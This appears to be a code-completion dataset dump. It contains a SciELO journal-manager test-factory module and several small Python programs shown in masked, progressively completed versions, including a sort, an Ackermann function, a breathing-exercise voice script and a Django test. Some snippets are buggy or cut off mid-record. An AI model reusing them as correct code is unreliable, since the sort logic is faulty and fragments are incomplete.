u'<a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><img alt="Licença Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png" /></a><br />Este trabalho foi licenciado com uma Licença <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'
)
class CollectionFactory(factory.Factory):
FACTORY_FOR = models.Collection
url = u'http://www.scielo.br/'
name = factory.Sequence(lambda n: 'scielo%s' % n)
address_number = u'430'
country = u'Brasil'
address = u'Rua Machado Bittencourt'
email = u'[email protected]'
name_slug = factory.Sequence(lambda n: 'scl%s' % n)
class JournalFactory(factory.Factory):
FACTORY_FOR = models.Journal
ctrl_vocabulary = u'decs'
frequency = u'Q'
scielo_issn = u'print'
print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))
eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))
init_vol = u'1'
title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'
title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'
short_title = u'ABCD.(São Paulo)'
editorial_standard = u'vancouv'
secs_code = u'6633'
init_year = u'1986'
acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))
pub_level = u'CT'
init_num = u'1',
subject_descriptors = (
u"""
MEDICINA
CIRURGIA
GASTROENTEROLOGIA
GASTROENTEROLOGIA"""
.strip())
publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'
publisher_country = u'BR'
publisher_state = u'SP'
publication_city = u'São Paulo'
editor_address = (
u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'
)
editor_email = u'[email protected]'
creator = factory.SubFactory(UserFactory)
use_license = factory.SubFactory(UseLicenseFactory)
class SectionFactory(factory.Factory):
FACTORY_FOR = models.Section
code = factory.Sequence(lambda n: 'BJCE%s' % n)
journal = factory.SubFactory(JournalFactory)
class LanguageFactory(factory.Factory):
FACTORY_FOR = models.Language
iso_code = 'pt'
name = 'portuguese'
class IssueTitleFactory(factory.Factory):
"""
``issue`` must be provided
"""
FACTORY_FOR = models.IssueTitle
language = factory.SubFactory(LanguageFactory)
title = u'Bla'
class IssueFactory(factory.Factory):
FACTORY_FOR = models.Issue
total_documents = 16
number = factory.Sequence(lambda n: '%s' % n)
volume = factory.Sequence(lambda n: '%s' % n)
is_trashed = False
publication_start_month = 9
publication_end_month = 11
publication_year = 2012
is_marked_up = False
suppl_text = '1'
journal = factory.SubFactory(JournalFactory)
@classmethod
def _prepare(cls, create, **kwargs):
section = SectionFactory()
issue = super(IssueFactory, cls)._prepare(create, **kwargs)
issue.section.add(section)
return issue
class UserProfileFactory(factory.Factory):
FACTORY_FOR = models.UserProfile
user = factory.SubFactory(UserFactory)
email_notifications = True
class SectionTitleFactory(factory.Factory):
FACTORY_FOR = models.SectionTitle
title = u'Artigos Originais'
language = factory.SubFactory(LanguageFactory)
section = factory.SubFactory(SectionFactory)
class RegularPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.RegularPressRelease
issue = factory.SubFactory(IssueFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class AheadPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.AheadPressRelease
journal = factory.SubFactory(JournalFactory)
doi = factory.Sequence(lambda n:
'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class PressReleaseTranslationFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseTranslation
language = factory.SubFactory(LanguageFactory)
press_release = factory.SubFactory(RegularPressReleaseFactory)
title = u'Yeah, this issue is amazing!'
content = u'Want to read more about...'
class PressReleaseArticleFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseArticle
press_release = factory.SubFactory(RegularPressReleaseFactory)
article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
class ArticleFactory(factory.Factory):
FACTORY_FOR = models.Article
xml = SAMPLE_XML
is_aop = False
domain_key = factory.Sequence(lambda n:
'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)
journal_title = u'Revista de Saúde Pública'
issn_ppub = u'0034-8910'
issn_epub = u'1518-8787'
xml_version = u'sps-1.2'
article_type = u'research-article'
doi = u'10.1590/S0034-8910.2014048004965'
class ArticleAssetFactory(factory.Factory):
FACTORY_FOR = models.ArticleAsset
article = factory.SubFactory(ArticleFactory)
file = File(SAMPLE_TIFF_IMAGE)
owner = u'SciELO'
use_license = u'Creative Commons - BY'
| # coding: utf-8
import os
import factory
import datetime
from journalmanager import models
from django.contrib.auth.models import Group
from django.core.files.base import File
_HERE = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216.xml')) as xml_file:
SAMPLE_XML = xml_file.read()
SAMPLE_TIFF_IMAGE = open(
os.path.join(_HERE, 'image_test', 'sample_tif_image.tif'))
with open(os.path.join(_HERE, 'xml_samples', '0034-8910-rsp-48-2-0216_related.xml')) as xml_file:
SAMPLE_XML_RELATED = xml_file.read()
class UserFactory(factory.Factory):
FACTORY_FOR = models.User
@classmethod
def _setup_next_sequence(cls):
try:
return cls._associated_class.objects.values_list(
'id', flat=True).order_by('-id')[0] + 1
except IndexError:
return 0
username = factory.Sequence(lambda n: "jmanager_username%s" % n)
first_name = factory.Sequence(lambda n: "jmanager_first_name%s" % n)
last_name = factory.Sequence(lambda n: "jmanager_last_name%s" % n)
email = factory.Sequence(lambda n: "jmanager_email%[email protected]" % n)
password = 'sha1$caffc$30d78063d8f2a5725f60bae2aca64e48804272c3'
is_staff = False
is_active = True
is_superuser = False
last_login = datetime.datetime(2000, 1, 1)
date_joined = datetime.datetime(1999, 1, 1)
class GroupFactory(factory.Factory):
FACTORY_FOR = Group
name = factory.Sequence(lambda n: "Group #%s" % n)
class SubjectCategoryFactory(factory.Factory):
FACTORY_FOR = models.SubjectCategory
term = 'Acoustics'
class StudyAreaFactory(factory.Factory):
FACTORY_FOR = models.StudyArea
study_area = 'Health Sciences'
class SponsorFactory(factory.Factory):
FACTORY_FOR = models.Sponsor
name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'
address = u'Av. Professor Lineu Prestes, 338 Cidade Universitária \
Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'
email = '[email protected]'
complement = ''
class UseLicenseFactory(factory.Factory):
FACTORY_FOR = models.UseLicense
license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)
reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'
disclaimer = u'<a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><img alt="Licença Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png" /></a><br />Este trabalho foi licenciado com uma Licença <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'
class CollectionFactory(factory.Factory):
FACTORY_FOR = models.Collection
url = u'http://www.scielo.br/'
name = factory.Sequence(lambda n: 'scielo%s' % n)
address_number = u'430'
country = u'Brasil'
address = u'Rua Machado Bittencourt'
email = u'[email protected]'
name_slug = factory.Sequence(lambda n: 'scl%s' % n)
class JournalFactory(factory.Factory):
FACTORY_FOR = models.Journal
ctrl_vocabulary = u'decs'
frequency = u'Q'
scielo_issn = u'print'
print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))
eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))
init_vol = u'1'
title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'
title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'
short_title = u'ABCD.(São Paulo)'
editorial_standard = u'vancouv'
secs_code = u'6633'
init_year = u'1986'
acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))
pub_level = u'CT'
init_num = u'1',
subject_descriptors = u"""
MEDICINA
CIRURGIA
GASTROENTEROLOGIA
GASTROENTEROLOGIA""".strip()
publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'
publisher_country = u'BR'
publisher_state = u'SP'
publication_city = u'São Paulo'
editor_address = u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'
editor_email = u'[email protected]'
creator = factory.SubFactory(UserFactory)
use_license = factory.SubFactory(UseLicenseFactory)
class SectionFactory(factory.Factory):
FACTORY_FOR = models.Section
code = factory.Sequence(lambda n: 'BJCE%s' % n)
journal = factory.SubFactory(JournalFactory)
class LanguageFactory(factory.Factory):
FACTORY_FOR = models.Language
iso_code = 'pt'
name = 'portuguese'
class IssueTitleFactory(factory.Factory):
"""
``issue`` must be provided
"""
FACTORY_FOR = models.IssueTitle
language = factory.SubFactory(LanguageFactory)
title = u'Bla'
class IssueFactory(factory.Factory):
FACTORY_FOR = models.Issue
total_documents = 16
number = factory.Sequence(lambda n: '%s' % n)
volume = factory.Sequence(lambda n: '%s' % n)
is_trashed = False
publication_start_month = 9
publication_end_month = 11
publication_year = 2012
is_marked_up = False
suppl_text = '1'
journal = factory.SubFactory(JournalFactory)
@classmethod
def _prepare(cls, create, **kwargs):
section = SectionFactory()
issue = super(IssueFactory, cls)._prepare(create, **kwargs)
issue.section.add(section)
return issue
class UserProfileFactory(factory.Factory):
FACTORY_FOR = models.UserProfile
user = factory.SubFactory(UserFactory)
email_notifications = True
class SectionTitleFactory(factory.Factory):
FACTORY_FOR = models.SectionTitle
title = u'Artigos Originais'
language = factory.SubFactory(LanguageFactory)
section = factory.SubFactory(SectionFactory)
class RegularPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.RegularPressRelease
issue = factory.SubFactory(IssueFactory)
doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class AheadPressReleaseFactory(factory.Factory):
FACTORY_FOR = models.AheadPressRelease
journal = factory.SubFactory(JournalFactory)
doi = factory.Sequence(lambda n: 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)
class PressReleaseTranslationFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseTranslation
language = factory.SubFactory(LanguageFactory)
press_release = factory.SubFactory(RegularPressReleaseFactory)
title = u'Yeah, this issue is amazing!'
content = u'Want to read more about...'
class PressReleaseArticleFactory(factory.Factory):
FACTORY_FOR = models.PressReleaseArticle
press_release = factory.SubFactory(RegularPressReleaseFactory)
article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)
class ArticleFactory(factory.Factory):
FACTORY_FOR = models.Article
xml = SAMPLE_XML
is_aop = False
domain_key = factory.Sequence(
lambda n: 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)
journal_title = u'Revista de Saúde Pública'
issn_ppub = u'0034-8910'
issn_epub = u'1518-8787'
xml_version = u'sps-1.2'
article_type = u'research-article'
doi = u'10.1590/S0034-8910.2014048004965'
class ArticleAssetFactory(factory.Factory):
FACTORY_FOR = models.ArticleAsset
article = factory.SubFactory(ArticleFactory)
file = File(SAMPLE_TIFF_IMAGE)
owner = u'SciELO'
use_license = u'Creative Commons - BY'
| [
20,
27,
31,
41,
47
] |
32 | 81dfdf0479fc1f136fa5153840d8c7015f9db676 | <mask token>
| <mask token>
loops(loop, phoneNumber, message)
| <mask token>
phoneNumber = 'fill the number'
message = 'fill with ur message'
loop = 1
loops(loop, phoneNumber, message)
| from theMachine import loops
phoneNumber = 'fill the number'
message = 'fill with ur message'
loop = 1
loops(loop, phoneNumber, message)
| # required !!!
# pip install selenium
# pip install webdriver-manager
from theMachine import loops
# fill the number and message
# you can fill the number with array
phoneNumber = "fill the number"
message = "fill with ur message"
loop = 1 # this how many u want to loop
loops(loop, phoneNumber, message) # input how many u want to loop
| [
0,
1,
2,
3,
4
] |
33 | 24de4f486d4e976850e94a003f8d9cbe3e518402 | <mask token>
| <mask token>
for x in a:
b.append(int(x))
print(b)
<mask token>
for i in range(l):
s = len(b[:i])
for j in range(s):
if b[s] < b[j]:
c = b[s]
b.pop(s)
b.insert(b.index(b[j]), c)
print(b, b[:i], b[s])
| a = input('Enter number')
a = a.split()
b = []
for x in a:
b.append(int(x))
print(b)
l = len(b)
c = 0
s = 0
for i in range(l):
s = len(b[:i])
for j in range(s):
if b[s] < b[j]:
c = b[s]
b.pop(s)
b.insert(b.index(b[j]), c)
print(b, b[:i], b[s])
| a= input("Enter number")
a= a.split()
b=[]
for x in a:
b.append(int(x))
print(b)
l=len(b)
c=0
s=0
for i in range(l):
s=len(b[:i])
for j in range(s):
if b[s]<b[j]:
c=b[s]
b.pop(s)
b.insert(b.index(b[j]),c)
print(b,b[:i],b[s])
| null | [
0,
1,
2,
3
] |
34 | 0ecd2a298203365b20b2369a99c3c1d7c0646f19 | # coding: utf-8
#ack program with the ackermann_function
""" ackermann_function """
def ack(m,n):
#n+1 if m = 0
if m is 0:
return n + 1
#A(m−1, 1) if m > 0 and n = 0
if m > 0 and n is 0:
return ack(m-1, 1)
#A(m−1, A(m, n−1)) if m > 0 and n > 0
if m > 0 and n > 0:
return ack(m-1, ack(m, n - 1))
if __name__ == "__main__":
expected = [[1,2,3,4,5],
[2,3,4,5,6],
[3,5,7,9,11],
[5,13,29,61,125]]
ok = True
for m in range(4):
for n in range(5):
actual = ack(m,n)
if not actual == expected[m][n]:
print "error"
ok = False
if ok:
print "All tests pass"
| null | null | null | null | [
0
] |
35 | a98be930058269a6adbc9a28d1c0ad5d9abba136 | <mask token>
def nums(phrase, morph=pymorphy2.MorphAnalyzer()):
""" согласование существительных с числительными, стоящими перед ними """
phrase = phrase.replace(' ', ' ').replace(',', ' ,')
numeral = ''
new_phrase = []
for word in phrase.split(' '):
if 'NUMB' in morph.parse(word)[0].tag:
numeral = word
if numeral:
word = str(morph.parse(word)[0].make_agree_with_number(abs(int(
numeral))).word)
new_phrase.append(word)
return ' '.join(new_phrase).replace(' ,', ',')
<mask token>
class Workout:
def __init__(self, rounds=3, breaths=30, hold=15):
self.rounds = rounds
self.breaths = breaths
self.hold = hold
self.round_times = []
self.lock = threading.Lock()
def __str__(self):
return '\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)
def __hold_breath(self):
start_time = time.time()
input()
seconds = int(time.time() - start_time)
mins = seconds // 60
secs = seconds % 60
self.round_times.append('{:02}:{:02}'.format(mins, secs))
play_wav_inline('inhale')
self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(
mins, secs)))
def __clock_tick(self):
for i in range(self.hold):
if i < hold - 3:
time.sleep(1)
else:
play_wav('clock')
play_wav_inline('gong2')
def __breathe_round(self, round):
self.say('Раунд ' + str(round))
for i in range(self.breaths):
if i % 10 == 0:
play_wav_inline('gong')
play_wav('inhale')
print(i + 1, end=' ')
play_wav('exhale')
print()
self.say('Задерживаем дыхание на выдохе')
self.__hold_breath()
self.__clock_tick()
play_wav_inline('exhale')
self.say('Выдох')
time.sleep(1)
def breathe(self):
self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))
self.say('Каждый раунд это ' + nums(str(self.breaths) +
' глубокий вдох - и спокойный выдох'))
self.say('Приготовились...')
for i in range(self.rounds):
self.__breathe_round(i + 1)
self.say('Восстанавливаем дыхание.')
def statistics(self):
print('=============')
for i in range(len(self.round_times)):
print('Раунд', i, self.round_times[i])
print('=============')
def say(self, what):
self.lock.acquire()
thread = threading.Thread(target=speak, kwargs={'what': what})
thread.start()
thread.join()
self.lock.release()
<mask token>
| <mask token>
def play_wav(src):
wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav')
wav.play()
time.sleep(wav.duration)
<mask token>
def nums(phrase, morph=pymorphy2.MorphAnalyzer()):
""" согласование существительных с числительными, стоящими перед ними """
phrase = phrase.replace(' ', ' ').replace(',', ' ,')
numeral = ''
new_phrase = []
for word in phrase.split(' '):
if 'NUMB' in morph.parse(word)[0].tag:
numeral = word
if numeral:
word = str(morph.parse(word)[0].make_agree_with_number(abs(int(
numeral))).word)
new_phrase.append(word)
return ' '.join(new_phrase).replace(' ,', ',')
<mask token>
class Workout:
def __init__(self, rounds=3, breaths=30, hold=15):
self.rounds = rounds
self.breaths = breaths
self.hold = hold
self.round_times = []
self.lock = threading.Lock()
def __str__(self):
return '\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)
def __hold_breath(self):
start_time = time.time()
input()
seconds = int(time.time() - start_time)
mins = seconds // 60
secs = seconds % 60
self.round_times.append('{:02}:{:02}'.format(mins, secs))
play_wav_inline('inhale')
self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(
mins, secs)))
def __clock_tick(self):
for i in range(self.hold):
if i < hold - 3:
time.sleep(1)
else:
play_wav('clock')
play_wav_inline('gong2')
def __breathe_round(self, round):
self.say('Раунд ' + str(round))
for i in range(self.breaths):
if i % 10 == 0:
play_wav_inline('gong')
play_wav('inhale')
print(i + 1, end=' ')
play_wav('exhale')
print()
self.say('Задерживаем дыхание на выдохе')
self.__hold_breath()
self.__clock_tick()
play_wav_inline('exhale')
self.say('Выдох')
time.sleep(1)
def breathe(self):
self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))
self.say('Каждый раунд это ' + nums(str(self.breaths) +
' глубокий вдох - и спокойный выдох'))
self.say('Приготовились...')
for i in range(self.rounds):
self.__breathe_round(i + 1)
self.say('Восстанавливаем дыхание.')
def statistics(self):
print('=============')
for i in range(len(self.round_times)):
print('Раунд', i, self.round_times[i])
print('=============')
def say(self, what):
self.lock.acquire()
thread = threading.Thread(target=speak, kwargs={'what': what})
thread.start()
thread.join()
self.lock.release()
<mask token>
| <mask token>
warnings.filterwarnings('ignore')
<mask token>
def play_wav(src):
wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav')
wav.play()
time.sleep(wav.duration)
def play_wav_inline(src):
wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav')
wav.play()
def correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):
new_phrase = []
py_gen = 1
phrase = phrase.split(' ')
while phrase:
word = phrase.pop(-1)
if 'NUMB' in morph.parse(word)[0].tag:
new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))
else:
new_phrase.append(word)
py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0
].tag else pytils.numeral.MALE
return ' '.join(new_phrase[::-1])
def nums(phrase, morph=pymorphy2.MorphAnalyzer()):
""" согласование существительных с числительными, стоящими перед ними """
phrase = phrase.replace(' ', ' ').replace(',', ' ,')
numeral = ''
new_phrase = []
for word in phrase.split(' '):
if 'NUMB' in morph.parse(word)[0].tag:
numeral = word
if numeral:
word = str(morph.parse(word)[0].make_agree_with_number(abs(int(
numeral))).word)
new_phrase.append(word)
return ' '.join(new_phrase).replace(' ,', ',')
def speak(what):
speech_voice = 3
rate = 120
tts = pyttsx3.init()
voices = tts.getProperty('voices')
tts.setProperty('rate', rate)
tts.setProperty('voice', voices[speech_voice].id)
print('🔊', what)
what = correct_numerals(what)
tts.say(what)
tts.runAndWait()
class Workout:
def __init__(self, rounds=3, breaths=30, hold=15):
self.rounds = rounds
self.breaths = breaths
self.hold = hold
self.round_times = []
self.lock = threading.Lock()
def __str__(self):
return '\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)
def __hold_breath(self):
start_time = time.time()
input()
seconds = int(time.time() - start_time)
mins = seconds // 60
secs = seconds % 60
self.round_times.append('{:02}:{:02}'.format(mins, secs))
play_wav_inline('inhale')
self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(
mins, secs)))
def __clock_tick(self):
for i in range(self.hold):
if i < hold - 3:
time.sleep(1)
else:
play_wav('clock')
play_wav_inline('gong2')
def __breathe_round(self, round):
self.say('Раунд ' + str(round))
for i in range(self.breaths):
if i % 10 == 0:
play_wav_inline('gong')
play_wav('inhale')
print(i + 1, end=' ')
play_wav('exhale')
print()
self.say('Задерживаем дыхание на выдохе')
self.__hold_breath()
self.__clock_tick()
play_wav_inline('exhale')
self.say('Выдох')
time.sleep(1)
def breathe(self):
self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))
self.say('Каждый раунд это ' + nums(str(self.breaths) +
' глубокий вдох - и спокойный выдох'))
self.say('Приготовились...')
for i in range(self.rounds):
self.__breathe_round(i + 1)
self.say('Восстанавливаем дыхание.')
def statistics(self):
print('=============')
for i in range(len(self.round_times)):
print('Раунд', i, self.round_times[i])
print('=============')
def say(self, what):
self.lock.acquire()
thread = threading.Thread(target=speak, kwargs={'what': what})
thread.start()
thread.join()
self.lock.release()
<mask token>
workout.breathe()
workout.statistics()
| <mask token>
warnings.filterwarnings('ignore')
<mask token>
rounds, breaths, hold = 4, 30, 13
def play_wav(src):
wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav')
wav.play()
time.sleep(wav.duration)
def play_wav_inline(src):
wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav')
wav.play()
def correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):
new_phrase = []
py_gen = 1
phrase = phrase.split(' ')
while phrase:
word = phrase.pop(-1)
if 'NUMB' in morph.parse(word)[0].tag:
new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))
else:
new_phrase.append(word)
py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0
].tag else pytils.numeral.MALE
return ' '.join(new_phrase[::-1])
def nums(phrase, morph=pymorphy2.MorphAnalyzer()):
""" согласование существительных с числительными, стоящими перед ними """
phrase = phrase.replace(' ', ' ').replace(',', ' ,')
numeral = ''
new_phrase = []
for word in phrase.split(' '):
if 'NUMB' in morph.parse(word)[0].tag:
numeral = word
if numeral:
word = str(morph.parse(word)[0].make_agree_with_number(abs(int(
numeral))).word)
new_phrase.append(word)
return ' '.join(new_phrase).replace(' ,', ',')
def speak(what):
speech_voice = 3
rate = 120
tts = pyttsx3.init()
voices = tts.getProperty('voices')
tts.setProperty('rate', rate)
tts.setProperty('voice', voices[speech_voice].id)
print('🔊', what)
what = correct_numerals(what)
tts.say(what)
tts.runAndWait()
class Workout:
def __init__(self, rounds=3, breaths=30, hold=15):
self.rounds = rounds
self.breaths = breaths
self.hold = hold
self.round_times = []
self.lock = threading.Lock()
def __str__(self):
return '\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)
def __hold_breath(self):
start_time = time.time()
input()
seconds = int(time.time() - start_time)
mins = seconds // 60
secs = seconds % 60
self.round_times.append('{:02}:{:02}'.format(mins, secs))
play_wav_inline('inhale')
self.say('Глубокий вдох. ' + nums('{} минута {} секунда'.format(
mins, secs)))
def __clock_tick(self):
for i in range(self.hold):
if i < hold - 3:
time.sleep(1)
else:
play_wav('clock')
play_wav_inline('gong2')
def __breathe_round(self, round):
self.say('Раунд ' + str(round))
for i in range(self.breaths):
if i % 10 == 0:
play_wav_inline('gong')
play_wav('inhale')
print(i + 1, end=' ')
play_wav('exhale')
print()
self.say('Задерживаем дыхание на выдохе')
self.__hold_breath()
self.__clock_tick()
play_wav_inline('exhale')
self.say('Выдох')
time.sleep(1)
def breathe(self):
self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))
self.say('Каждый раунд это ' + nums(str(self.breaths) +
' глубокий вдох - и спокойный выдох'))
self.say('Приготовились...')
for i in range(self.rounds):
self.__breathe_round(i + 1)
self.say('Восстанавливаем дыхание.')
def statistics(self):
print('=============')
for i in range(len(self.round_times)):
print('Раунд', i, self.round_times[i])
print('=============')
def say(self, what):
self.lock.acquire()
thread = threading.Thread(target=speak, kwargs={'what': what})
thread.start()
thread.join()
self.lock.release()
workout = Workout(rounds, breaths, hold)
workout.breathe()
workout.statistics()
| import sys
import time
import pymorphy2
import pyglet
import pyttsx3
import threading
import warnings
import pytils
warnings.filterwarnings("ignore")
""" Количество раундов, вдохов в раунде, задержка дыхания на вдохе"""
rounds, breaths, hold = 4, 30, 13
def play_wav(src):
wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav')
wav.play()
time.sleep(wav.duration)
def play_wav_inline(src):
wav = pyglet.media.load(sys.path[0] + '\\src\\wav\\' + src + '.wav')
wav.play()
def correct_numerals(phrase, morph=pymorphy2.MorphAnalyzer()):
new_phrase = []
py_gen = 1
phrase = phrase.split(' ')
while phrase:
word = phrase.pop(-1)
if 'NUMB' in morph.parse(word)[0].tag:
new_phrase.append(pytils.numeral.sum_string(int(word), py_gen))
else:
new_phrase.append(word)
py_gen = pytils.numeral.FEMALE if 'femn' in morph.parse(word)[0].tag else pytils.numeral.MALE
return ' '.join(new_phrase[::-1])
def nums(phrase, morph=pymorphy2.MorphAnalyzer()):
""" согласование существительных с числительными, стоящими перед ними """
phrase = phrase.replace(' ', ' ').replace(',', ' ,')
numeral = ''
new_phrase = []
for word in phrase.split(' '):
if 'NUMB' in morph.parse(word)[0].tag:
numeral = word
if numeral:
word = str(morph.parse(word)[0].make_agree_with_number(abs(int(numeral))).word)
new_phrase.append(word)
return ' '.join(new_phrase).replace(' ,', ',')
def speak(what):
speech_voice = 3 # голосовой движок
rate = 120
tts = pyttsx3.init()
voices = tts.getProperty("voices")
tts.setProperty('rate', rate)
tts.setProperty("voice", voices[speech_voice].id)
print('🔊', what)
what = correct_numerals(what)
tts.say(what)
tts.runAndWait()
# tts.stop()
class Workout:
def __init__(self, rounds=3, breaths=30, hold=15):
self.rounds = rounds
self.breaths = breaths
self.hold = hold
self.round_times = []
self.lock = threading.Lock() # взаимоблокировка отдельных голосовых потоков
def __str__(self):
return '\n♻{} 🗣{} ⏱{}'.format(self.rounds, self.breaths, self.hold)
def __hold_breath(self):
start_time = time.time()
input()
seconds = int(time.time() - start_time)
mins = seconds // 60
secs = seconds % 60
self.round_times.append('{:02}:{:02}'.format(mins, secs))
play_wav_inline('inhale')
self.say('Глубокий вдох. ' + nums("{} минута {} секунда".format(mins, secs)))
def __clock_tick(self):
for i in range(self.hold):
if i < hold - 3:
time.sleep(1)
else:
play_wav('clock')
play_wav_inline('gong2')
def __breathe_round(self, round):
self.say('Раунд ' + str(round))
for i in range(self.breaths):
if i % 10 == 0:
play_wav_inline('gong')
play_wav('inhale')
print(i + 1, end=' ')
play_wav('exhale')
print()
self.say('Задерживаем дыхание на выдохе')
self.__hold_breath()
# self.say('Держим ' + nums(str(self.hold) + ' секунда'))
self.__clock_tick()
play_wav_inline('exhale')
self.say('Выдох')
time.sleep(1)
def breathe(self):
self.say('Выполняем ' + nums(str(self.rounds) + ' раунд'))
self.say('Каждый раунд это ' + nums(str(self.breaths) + ' глубокий вдох - и спокойный выдох'))
self.say('Приготовились...')
for i in range(self.rounds):
self.__breathe_round(i + 1)
self.say('Восстанавливаем дыхание.')
def statistics(self):
print('=============')
for i in range(len(self.round_times)):
print('Раунд', i, self.round_times[i])
print('=============')
def say(self, what):
self.lock.acquire()
thread = threading.Thread(target=speak, kwargs={'what': what})
thread.start()
thread.join()
self.lock.release()
workout = Workout(rounds, breaths, hold)
workout.breathe()
workout.statistics()
| [
10,
11,
15,
16,
18
] |
36 | 4f0933c58aa1d41faf4f949d9684c04f9e01b473 | <mask token>
| <mask token>
print(f'copying from {from_file} to {to_file}')
<mask token>
print(f'the input file is {len(indata)} bytes long')
print(f'does the output file exist? {exists(to_file)}')
print('return to continue, CTRL-C to abort')
input('?')
open(to_file, 'w').write(indata)
print('done!')
| <mask token>
from_file = input('form_file')
to_file = input('to_file')
print(f'copying from {from_file} to {to_file}')
indata = open(from_file).read()
print(f'the input file is {len(indata)} bytes long')
print(f'does the output file exist? {exists(to_file)}')
print('return to continue, CTRL-C to abort')
input('?')
open(to_file, 'w').write(indata)
print('done!')
| from os.path import exists
from_file = input('form_file')
to_file = input('to_file')
print(f'copying from {from_file} to {to_file}')
indata = open(from_file).read()
print(f'the input file is {len(indata)} bytes long')
print(f'does the output file exist? {exists(to_file)}')
print('return to continue, CTRL-C to abort')
input('?')
open(to_file, 'w').write(indata)
print('done!')
| from os.path import exists
from_file = input('form_file')
to_file = input('to_file')
print(f"copying from {from_file} to {to_file}")
indata = open(from_file).read()#这种方式读取文件后无需close
print(f"the input file is {len(indata)} bytes long")
print(f"does the output file exist? {exists(to_file)}")
print("return to continue, CTRL-C to abort")
input('?')
open(to_file,'w').write(indata)#无需close
print("done!")
| [
0,
1,
2,
3,
4
] |
37 | 5c81ddbc8f5a162949a100dbef1c69551d9e267a | <mask token>
class MyTestCase(TestCase):
<mask token>
<mask token>
| <mask token>
class MyTestCase(TestCase):
def test_mark_done(self):
user = User.objects.create_user(email='user@…', username='user',
password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)
res = todo.mark_done(user)
self.assertTrue(res)
self.assertEqual(Todo.objects.count(), 1)
<mask token>
| <mask token>
class MyTestCase(TestCase):
def test_mark_done(self):
user = User.objects.create_user(email='user@…', username='user',
password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', owner=user)
res = todo.mark_done(user)
self.assertTrue(res)
self.assertEqual(Todo.objects.count(), 1)
def test_mark_done_already_done(self):
user = User.objects.create_user(email='user@…', username='user',
password='somepasswd')
todo = Todo(title='SomeTitle', description='SomeDescr', is_done=
True, done_by=user, owner=user)
res = todo.mark_done(user)
self.assertIsNone(res)
self.assertEqual(Todo.objects.count(), 0)
| from django.test import TestCase
from django.contrib.auth.models import User
from ..models import Todo
class MyTestCase(TestCase):
def test_mark_done(self):
